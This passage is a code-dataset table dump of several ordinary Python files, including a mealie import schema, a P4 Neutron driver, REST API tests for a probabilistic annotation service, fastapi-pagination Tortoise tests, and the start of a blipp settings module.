hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f393860dc4d8f40166995d44a4269a5f45efbb2d | 480 | py | Python | mealie/schema/restore.py | danielpalstra/mealie | 6c549ff99329e494bc6aad2109973e7eec6c445e | [
"MIT"
] | 1,927 | 2021-01-02T20:01:15.000Z | 2022-03-31T22:49:18.000Z | mealie/schema/restore.py | danielpalstra/mealie | 6c549ff99329e494bc6aad2109973e7eec6c445e | [
"MIT"
] | 545 | 2021-01-02T20:32:28.000Z | 2022-03-31T23:37:08.000Z | mealie/schema/restore.py | danielpalstra/mealie | 6c549ff99329e494bc6aad2109973e7eec6c445e | [
"MIT"
] | 254 | 2021-01-03T00:20:07.000Z | 2022-03-23T22:37:21.000Z | from typing import Optional
from pydantic.main import BaseModel
| 12.631579 | 37 | 0.733333 | from typing import Optional
from pydantic.main import BaseModel
class ImportBase(BaseModel):
name: str
status: bool
exception: Optional[str]
class RecipeImport(ImportBase):
slug: Optional[str]
class ThemeImport(ImportBase):
pass
class SettingsImport(ImportBase):
pass
class GroupImport(ImportBase):
pass
class UserImport(ImportBase):
pass
class CustomPageImport(ImportBase):
pass
class NotificationImport(ImportBase):
pass
| 0 | 223 | 184 |
807a761fa093a53e100a03a206335656aefa8eff | 4,016 | py | Python | networking_p4/services/service_drivers/default/driver.py | osinstom/networking-p4 | 3b82025090b6b2bf1e9faa58492d13ed1da6c34f | [
"Apache-2.0"
] | 2 | 2019-12-26T08:53:25.000Z | 2020-05-13T11:53:51.000Z | networking_p4/services/service_drivers/default/driver.py | osinstom/networking-dppx | 3b82025090b6b2bf1e9faa58492d13ed1da6c34f | [
"Apache-2.0"
] | null | null | null | networking_p4/services/service_drivers/default/driver.py | osinstom/networking-dppx | 3b82025090b6b2bf1e9faa58492d13ed1da6c34f | [
"Apache-2.0"
] | null | null | null | from networking_p4.services.service_drivers.default.services.attach_module import AttachModuleService
from networking_p4.services.service_drivers.default.services.configure_module import ConfigureModuleService
from networking_p4.services.service_drivers.default.services.create_module import CreateModuleService
from networking_p4.services.service_drivers.default.services.delete_module import DeleteModuleService
from networking_p4.services.service_drivers.default.services.detach_module import DetachModuleService
from networking_p4.services.service_drivers.default.services.module_configuration import GetModuleConfigurationService
from networking_p4.services.service_drivers.default.services.unconfigure_module import UnconfigureModuleService
from networking_p4.services.service_drivers.default.services.update_module import UpdateModuleService
from networking_p4.services.service_drivers.driver_api import P4DriverApi, P4DriverBase
from oslo_log import log as logging
from networking_p4.services.service_drivers.default import rpc as p4_rpc
from networking_p4.services.common import rpc_topics
from neutron_lib import context as n_context
import neutron.common.rpc as n_rpc
LOG = logging.getLogger(__name__)
class DefaultP4Driver(P4DriverApi,
P4DriverBase):
""" Implementation of default driver for P4 service """
| 44.131868 | 118 | 0.758217 | from networking_p4.services.service_drivers.default.services.attach_module import AttachModuleService
from networking_p4.services.service_drivers.default.services.configure_module import ConfigureModuleService
from networking_p4.services.service_drivers.default.services.create_module import CreateModuleService
from networking_p4.services.service_drivers.default.services.delete_module import DeleteModuleService
from networking_p4.services.service_drivers.default.services.detach_module import DetachModuleService
from networking_p4.services.service_drivers.default.services.module_configuration import GetModuleConfigurationService
from networking_p4.services.service_drivers.default.services.unconfigure_module import UnconfigureModuleService
from networking_p4.services.service_drivers.default.services.update_module import UpdateModuleService
from networking_p4.services.service_drivers.driver_api import P4DriverApi, P4DriverBase
from oslo_log import log as logging
from networking_p4.services.service_drivers.default import rpc as p4_rpc
from networking_p4.services.common import rpc_topics
from neutron_lib import context as n_context
import neutron.common.rpc as n_rpc
LOG = logging.getLogger(__name__)
class DefaultP4Driver(P4DriverApi,
P4DriverBase):
""" Implementation of default driver for P4 service """
def __init__(self):
LOG.info("DefaultP4Driver started.")
self.rpc_client = None
self.rpc_ctx = None
self.callbacks = dict()
def initialize(self):
# super(DefaultP4Driver, self).initialize()
LOG.info("DefaultP4Driver started.")
self.rpc_client = p4_rpc.P4AgentRpcClient(
rpc_topics.P4_AGENT
)
self.rpc_ctx = n_context.get_admin_context()
self._setup_rpc()
# initialize services
self.create_module_svc = CreateModuleService(self.rpc_client)
self.update_module_svc = UpdateModuleService(self.rpc_client)
self.delete_module_svc = DeleteModuleService(self.rpc_client)
self.attach_module_svc = AttachModuleService(self.rpc_client)
self.detach_module_svc = DetachModuleService(self.rpc_client)
self.configure_module_svc = ConfigureModuleService(self.rpc_client)
self.unconfigure_module_svc = UnconfigureModuleService(self.rpc_client)
self.get_module_configuration_svc = GetModuleConfigurationService(self.rpc_client)
def add_callback(self, topic, callback):
self.callbacks[topic] = callback
def _setup_rpc(self):
# Setup a rpc server
self.topic = rpc_topics.P4_PLUGIN
self.endpoints = [p4_rpc.P4RpcCallback(self)]
self.conn = n_rpc.create_connection()
self.conn.create_consumer(self.topic, self.endpoints, fanout=False)
self.conn.consume_in_threads()
def create_module(self, context):
LOG.info("DefaultDriver: Creating P4 module")
self.create_module_svc.handle(context)
def update_module(self, context):
LOG.info("DefaultDriver: Updating program")
self.update_module_svc.handle(context)
def delete_module(self, context):
LOG.info("DefaultDriver: Deleting P4 module")
self.delete_module_svc.handle(context)
def attach_module(self, context):
LOG.info("DefaultDriver: Attaching P4 module")
self.attach_module_svc.handle(context)
def detach_module(self, context):
LOG.info("DefaultDriver: Detaching P4 module")
self.detach_module_svc.handle(context)
def configure_module(self, context):
LOG.info("DefaultDriver: Configuring P4 module")
self.configure_module_svc.handle(context)
def unconfigure_module(self, context):
LOG.info("DefaultDriver: Unconfiguring P4 module")
self.unconfigure_module_svc.handle(context)
def get_module_configuration(self, context):
LOG.info("DefaultDriver: Get P4 module configuration")
return self.get_module_configuration_svc.handle(context)
| 2,343 | 0 | 324 |
a84b00a226e429cf7c8dcfc2193791c10769443b | 160 | py | Python | Codes/Miscellaneous/hello_world.py | datta-agni/python-codes | d902d0aaf23d2ea4b60ed7ecab0d593e3334c23b | [
"MIT"
] | null | null | null | Codes/Miscellaneous/hello_world.py | datta-agni/python-codes | d902d0aaf23d2ea4b60ed7ecab0d593e3334c23b | [
"MIT"
] | null | null | null | Codes/Miscellaneous/hello_world.py | datta-agni/python-codes | d902d0aaf23d2ea4b60ed7ecab0d593e3334c23b | [
"MIT"
] | null | null | null | # Hello World program.
# This is where you write a comment.
if __name__ == "__main__":
hello_world()
| 17.777778 | 36 | 0.6625 | # Hello World program.
# This is where you write a comment.
def hello_world() -> None:
print("HELLO! WORLD")
if __name__ == "__main__":
hello_world()
| 31 | 0 | 22 |
c34a5ef2ecb12157c6357b1cc9ffba018bbf96f0 | 26,794 | py | Python | test/api_tests.py | kingb12/flask_probanno | c0c57d3bac987eebc037ac21903c85ac628705a1 | [
"MIT"
] | null | null | null | test/api_tests.py | kingb12/flask_probanno | c0c57d3bac987eebc037ac21903c85ac628705a1 | [
"MIT"
] | null | null | null | test/api_tests.py | kingb12/flask_probanno | c0c57d3bac987eebc037ac21903c85ac628705a1 | [
"MIT"
] | null | null | null | import requests
import unittest
import json
import uuid
from flask_probanno import GET, POST, PUT
from controllers.probanno_management import CALCULATE_PROBANNO_JOB
from controllers.job import COMPLETE
BASE_URL = "http://probannoweb.systemsbiology.net/api"
HEADERS = {'cache-control': 'no-cache'}
FASTA_1 = '267377'
CACHED_FASTA = '243232'
CACHED_FASTA_NAME = 'Methanocaldococcus jannaschii (strain ATCC 43067 / DSM 2661 / JAL-1 / JCM 10045 / NBRC 100440)'
NOT_A_FASTA = 'abcdef'
MY_FASTA_NAME = 'my_sequence'
TEST_MODEL_FILE = 'maripaludis_model.json'
GAPFILL_MODEL_JOB = "gapfill_model"
def make_api_request(path, method, headers, params=None, files=None, data=None):
"""
helper method for making a request and unpacking the JSON result
:param path: sub path of the API
:param method: HTTP method
:param headers: Associated headers
:return: HTTP result
"""
response = requests.request(method, BASE_URL + path, headers=headers, params=params, files=files, data=data)
return response
def make_and_unpack_request(path, method, headers, params=None, files=None, data=None):
"""
helper method for making a request and unpacking the JSON result
:param path: sub path of the API
:param method: HTTP method
:param headers: Associated headers
:return: HTTP result
"""
response = make_api_request(path, method, headers, params=params, files=files, data=data)
return json.loads(response.text)
if __name__ == '__main__':
unittest.main()
| 49.618519 | 132 | 0.542547 | import requests
import unittest
import json
import uuid
from flask_probanno import GET, POST, PUT
from controllers.probanno_management import CALCULATE_PROBANNO_JOB
from controllers.job import COMPLETE
BASE_URL = "http://probannoweb.systemsbiology.net/api"
HEADERS = {'cache-control': 'no-cache'}
FASTA_1 = '267377'
CACHED_FASTA = '243232'
CACHED_FASTA_NAME = 'Methanocaldococcus jannaschii (strain ATCC 43067 / DSM 2661 / JAL-1 / JCM 10045 / NBRC 100440)'
NOT_A_FASTA = 'abcdef'
MY_FASTA_NAME = 'my_sequence'
TEST_MODEL_FILE = 'maripaludis_model.json'
GAPFILL_MODEL_JOB = "gapfill_model"
class TestSessionMethods(unittest.TestCase):
def test_get_session(self):
try:
session = make_and_unpack_request("/session", GET, HEADERS)
# exception below indicates failure
my_uuid = uuid.UUID(session)
finally:
clear_session_values(session, clear_session=True)
class TestProbannoMethods(unittest.TestCase):
def test_calculate_likelihoods_get(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# un-cached
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session), params={"fasta_id": FASTA_1})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == FASTA_1
# cached
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session), params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# 404 FASTA not found
response = make_api_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": NOT_A_FASTA})
assert response.status_code == 404
# 400 No session
response = make_api_request("/probanno/calculate", GET, HEADERS,
params={"fasta_id": FASTA_1})
# 400 bad session
response = make_api_request("/probanno/calculate", GET, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_calculate_likelihoods_put(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# remove any values that would have been cached
files = {'fasta': open('267377.fasta', 'rb')}
data = {'fasta_id': MY_FASTA_NAME}
# un-cached
job = make_and_unpack_request("/probanno/calculate", PUT, authorize_headers(session), files=files, data=data)
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == MY_FASTA_NAME
# 400 no FASTA
response = make_api_request("/probanno/calculate", PUT, authorize_headers(session),
data=data)
# 400 no FASTA_ID
response = make_api_request("/probanno/calculate", PUT, authorize_headers(session),
files=files)
assert response.status_code == 400
# 400 No session
response = make_api_request("/probanno/calculate", PUT, HEADERS,
params={"fasta_id": FASTA_1})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/probanno/calculate", PUT, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_get_likelihoods(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
response = make_api_request("/probanno", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(response.status_code == 404)
# cached: populate it for our session
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# Now actually check retrieval
result = make_and_unpack_request("/probanno", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(type(result) == list)
# 400 No session
response = make_api_request("/probanno", GET, HEADERS,
params={"fasta_id": FASTA_1})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/probanno", GET, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
response = make_api_request("/probanno", GET, HEADERS,
params=None)
assert response.status_code == 400
response = make_api_request("/probanno", GET, authorize_headers(session),
params={"fasta_id": NOT_A_FASTA})
assert response.status_code == 404
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_list_likelihoods(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
result = make_and_unpack_request("/probanno/list", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(len(result) == 0 and type(result) == list)
# cached: populate it for our session
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# Now actually check retrieval
result = make_and_unpack_request("/probanno/list", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(type(result) == list)
assert(len(result) == 1)
assert(type(result[0]) == dict)
assert(result[0]['name'] == CACHED_FASTA_NAME)
assert(result[0]['fasta_id'] == CACHED_FASTA)
# 400 No session
response = make_api_request("/probanno/list", GET, HEADERS,
params={"fasta_id": FASTA_1})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/probanno/list", GET, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_download_likelihoods(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
response = make_api_request("/probanno/download", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(response.status_code == 404)
# cached: populate it for our session
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# Now actually check retrieval
result = make_api_request("/probanno/download", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(type(result.content) == str)
assert (type(json.loads(result.content) == list))
# 400 No session
response = make_api_request("/probanno", GET, HEADERS,
params={"fasta_id": FASTA_1})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/probanno", GET, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
class TestModelMethods(unittest.TestCase):
def test_get_model(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
job = None
with open(TEST_MODEL_FILE, 'rb') as f:
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert(response.status_code == 200)
# Now actually check retrieval
result = make_and_unpack_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result) == dict)
# 400 No session
response = make_api_request("/model", GET, HEADERS,
params={"model_id": model_id})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model", GET, authorize_headers(str(uuid.uuid4())),
params={"model_id": model_id})
assert response.status_code == 400
response = make_api_request("/model", GET, HEADERS,
params=None)
assert response.status_code == 400
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA})
assert response.status_code == 404
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_download_model(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
response = make_api_request("/model/download", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
job = None
with open(TEST_MODEL_FILE, 'rb') as f:
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Now actually check retrieval
result = make_api_request("/model/download", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result.content) == str)
assert(type(json.loads(result.content) == dict))
# 400 No session
response = make_api_request("/model/download", GET, HEADERS,
params={"model_id": model_id})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model/download", GET, authorize_headers(str(uuid.uuid4())),
params={"model_id": model_id})
assert response.status_code == 400
response = make_api_request("/model/download", GET, HEADERS,
params=None)
assert response.status_code == 400
response = make_api_request("/model/download", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA})
assert response.status_code == 404
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_model_put(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
f = open(TEST_MODEL_FILE, 'rb')
try:
# search for, expect missing
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Update Case
f = open(TEST_MODEL_FILE, 'rb')
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Now actually check retrieval
result = make_and_unpack_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result) == dict)
# 400 No session
response = make_api_request("/model", PUT, HEADERS,
data={"model_id": model_id}, files={"file": f})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model", PUT, authorize_headers(str(uuid.uuid4())),
data={"model_id": model_id}, files={"file": f})
assert response.status_code == 400
response = make_api_request("/model", PUT, HEADERS,
params=None)
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
f.close()
def test_model_post(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
f = open(TEST_MODEL_FILE, 'rb')
try:
# search for, expect missing
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
job = None
response = make_api_request("/model", POST, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Now actually check retrieval
result = make_and_unpack_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result) == dict)
# 400 No session
response = make_api_request("/model", POST, HEADERS,
data={"model_id": model_id}, files={"file": f})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model", POST, authorize_headers(str(uuid.uuid4())),
data={"model_id": model_id}, files={"file": f})
assert response.status_code == 400
response = make_api_request("/model", POST, HEADERS,
params=None)
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
f.close()
def test_model_list(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
result = make_and_unpack_request("/model/list", GET, authorize_headers(session))
assert (type(result) == list and len(result) == 0)
# cached: populate it for our session
with open(TEST_MODEL_FILE, 'rb') as f:
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Now actually check retrieval
result = make_and_unpack_request("/model/list", GET, authorize_headers(session))
assert (type(result) == list and len(result) == 1)
# 400 No session
response = make_api_request("/model/list", GET, HEADERS)
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model/list", GET, authorize_headers(str(uuid.uuid4())))
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_model_gapfill(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
try:
with open(TEST_MODEL_FILE, 'rb') as f:
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# cached
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# Now actually check gap-filling
job = make_and_unpack_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": model_id,
"fasta_id": CACHED_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert job['sid'] == session
assert job['job'] == GAPFILL_MODEL_JOB
assert job['target'] == model_id
# 400 No session
response = make_api_request("/model/gapfill", GET, HEADERS,
params={"model_id": model_id})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model/gapfill", GET, authorize_headers(str(uuid.uuid4())),
params={"model_id": model_id})
assert response.status_code == 400
response = make_api_request("/model/gapfill", GET, HEADERS,
params=None)
assert response.status_code == 400
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": model_id,
"fasta_id": NOT_A_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert response.status_code == 404
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA,
"fasta_id": CACHED_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert response.status_code == 404
# Test missing arguments
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA,
"fasta_id": CACHED_FASTA,
"template": "GramNegative"})
assert response.status_code == 400
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert response.status_code == 400
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
class TestJobMethods(unittest.TestCase):
def test_get_job(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
response = make_api_request("/job", GET, authorize_headers(session),
params={"job_id": FASTA_1})
assert response.status_code == 404
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": FASTA_1})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == FASTA_1
job = make_and_unpack_request("/job", GET, authorize_headers(session),
params={"job_id": job['jid']})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == FASTA_1
# 404 JOB not found
response = make_api_request("/job", GET, authorize_headers(session),
params={"job_id": NOT_A_FASTA})
assert response.status_code == 404
# 400 No session
response = make_api_request("/job", GET, HEADERS,
params={"job_id": job['jid']})
# 400 bad session
response = make_api_request("/job", GET, authorize_headers(str(uuid.uuid4())),
params={"job_id": job['jid']})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_list_job(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
result = make_and_unpack_request("/job/list", GET, authorize_headers(session))
assert type(result) == list and len(result) == 0
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": FASTA_1})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == FASTA_1
result = make_and_unpack_request("/job/list", GET, authorize_headers(session))
assert type(result) == list and len(result) == 1
# 400 No session
response = make_api_request("/job/list", GET, HEADERS)
# 400 bad session
response = make_api_request("/job/list", GET, authorize_headers(str(uuid.uuid4())))
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def make_api_request(path, method, headers, params=None, files=None, data=None):
"""
helper method for making a request and unpacking the JSON result
:param path: sub path of the API
:param method: HTTP method
:param headers: Associated headers
:return: HTTP result
"""
response = requests.request(method, BASE_URL + path, headers=headers, params=params, files=files, data=data)
return response
def make_and_unpack_request(path, method, headers, params=None, files=None, data=None):
"""
helper method for making a request and unpacking the JSON result
:param path: sub path of the API
:param method: HTTP method
:param headers: Associated headers
:return: HTTP result
"""
response = make_api_request(path, method, headers, params=params, files=files, data=data)
return json.loads(response.text)
def authorize_headers(session):
auth_headers = {"session": session}
auth_headers.update(HEADERS)
return auth_headers
def clear_session_values(session, clear_session=False):
make_api_request('/session/clear', GET, authorize_headers(session), params={'clear_session': clear_session})
if __name__ == '__main__':
unittest.main()
| 24,656 | 87 | 516 |
053693eaf318fe0813c25cb83119cbcdc6129a3f | 1,896 | py | Python | tests/ext/test_tortoise.py | XeryusTC/fastapi-pagination | 0e1e8542a9ab36f16b6c0ab7af2125b4a03dd095 | [
"MIT"
] | 315 | 2020-11-12T08:41:50.000Z | 2022-03-31T23:23:27.000Z | tests/ext/test_tortoise.py | XeryusTC/fastapi-pagination | 0e1e8542a9ab36f16b6c0ab7af2125b4a03dd095 | [
"MIT"
] | 280 | 2020-11-28T11:17:06.000Z | 2022-03-28T03:21:27.000Z | tests/ext/test_tortoise.py | XeryusTC/fastapi-pagination | 0e1e8542a9ab36f16b6c0ab7af2125b4a03dd095 | [
"MIT"
] | 50 | 2020-12-07T16:21:24.000Z | 2022-03-22T09:04:13.000Z | from fastapi import FastAPI
from pytest import fixture
from tortoise import Model
from tortoise.backends.base.executor import EXECUTOR_CACHE
from tortoise.contrib.fastapi import register_tortoise
from tortoise.fields import IntField, TextField
from fastapi_pagination import Page, add_pagination
from fastapi_pagination.ext.tortoise import paginate
from fastapi_pagination.limit_offset import Page as LimitOffsetPage
from ..base import BasePaginationTestCase, SafeTestClient, UserOut
from ..utils import faker
@fixture(
scope="session",
params=[True, False],
ids=["model", "query"],
)
@fixture(scope="session")
| 25.28 | 75 | 0.683017 | from fastapi import FastAPI
from pytest import fixture
from tortoise import Model
from tortoise.backends.base.executor import EXECUTOR_CACHE
from tortoise.contrib.fastapi import register_tortoise
from tortoise.fields import IntField, TextField
from fastapi_pagination import Page, add_pagination
from fastapi_pagination.ext.tortoise import paginate
from fastapi_pagination.limit_offset import Page as LimitOffsetPage
from ..base import BasePaginationTestCase, SafeTestClient, UserOut
from ..utils import faker
class User(Model):
id = IntField(pk=True)
name = TextField(null=False)
class Meta:
table = "users"
@fixture(
scope="session",
params=[True, False],
ids=["model", "query"],
)
def query(request):
if request.param:
return User
else:
return User.all()
@fixture(scope="session")
def app(query, database_url):
    """Build a FastAPI app wired to Tortoise with two paginated test routes."""
    app = FastAPI()
    # normalize the URL scheme to the 'postgres://' form tortoise accepts
    if database_url.startswith("postgresql://"):
        database_url = database_url.replace("postgresql://", "postgres://")
    # for sqlite, always use an in-memory database regardless of the given URL
    if database_url.startswith("sqlite"):
        database_url = "sqlite://:memory:"
    # clear tortoise's executor cache so repeated app builds in one test
    # session don't reuse executors bound to a previous connection
    EXECUTOR_CACHE.clear()
    register_tortoise(
        app,
        modules={"models": [__name__]},
        db_url=database_url,
        generate_schemas=True,
    )
    # one handler registered under two paths; the per-route response_model
    # selects which pagination flavor is applied
    @app.get("/default", response_model=Page[UserOut])
    @app.get("/limit-offset", response_model=LimitOffsetPage[UserOut])
    async def route():
        return await paginate(query)
    add_pagination(app)
    return app
class TestTortoise(BasePaginationTestCase):
    """Run the shared pagination test-suite against the Tortoise ORM backend."""
    @fixture(scope="session")
    async def client(self, app):
        # yield inside the context manager so the client is torn down only
        # at the end of the whole session
        with SafeTestClient(app) as c:
            yield c
    @fixture(scope="session")
    async def entities(self, query, client):
        """Reset the users table and seed it with 100 fake rows."""
        # depends on `client` — presumably to guarantee the app (and the
        # generated schema) exists before touching the table; confirm
        await User.all().delete()
        for _ in range(100):
            await User.create(name=faker.name())
        return await User.all()
| 942 | 233 | 90 |
d0a7d576f5e655561b0da5618e1081fc4b02ab4c | 9,647 | py | Python | blipp/settings.py | periscope-ps/blipp | 002d08e911fb94c34d7f05e34883efa8f6138a4f | [
"BSD-3-Clause"
] | null | null | null | blipp/settings.py | periscope-ps/blipp | 002d08e911fb94c34d7f05e34883efa8f6138a4f | [
"BSD-3-Clause"
] | null | null | null | blipp/settings.py | periscope-ps/blipp | 002d08e911fb94c34d7f05e34883efa8f6138a4f | [
"BSD-3-Clause"
] | 1 | 2015-12-14T01:14:39.000Z | 2015-12-14T01:14:39.000Z | # =============================================================================
# periscope-ps (blipp)
#
# Copyright (c) 2013-2016, Trustees of Indiana University,
# All rights reserved.
#
# This software may be modified and distributed under the terms of the BSD
# license. See the COPYING file for details.
#
# This software was created at the Indiana University Center for Research in
# Extreme Scale Technologies (CREST).
# =============================================================================
import ConfigParser
import socket
import netifaces
import utils
SCHEMAS = {
'networkresources': 'http://unis.crest.iu.edu/schema/20160630/networkresource#',
'nodes': 'http://unis.crest.iu.edu/schema/20160630/node#',
'domains': 'http://unis.crest.iu.edu/schema/20160630/domain#',
'ports': 'http://unis.crest.iu.edu/schema/20160630/port#',
'links': 'http://unis.crest.iu.edu/schema/20160630/link#',
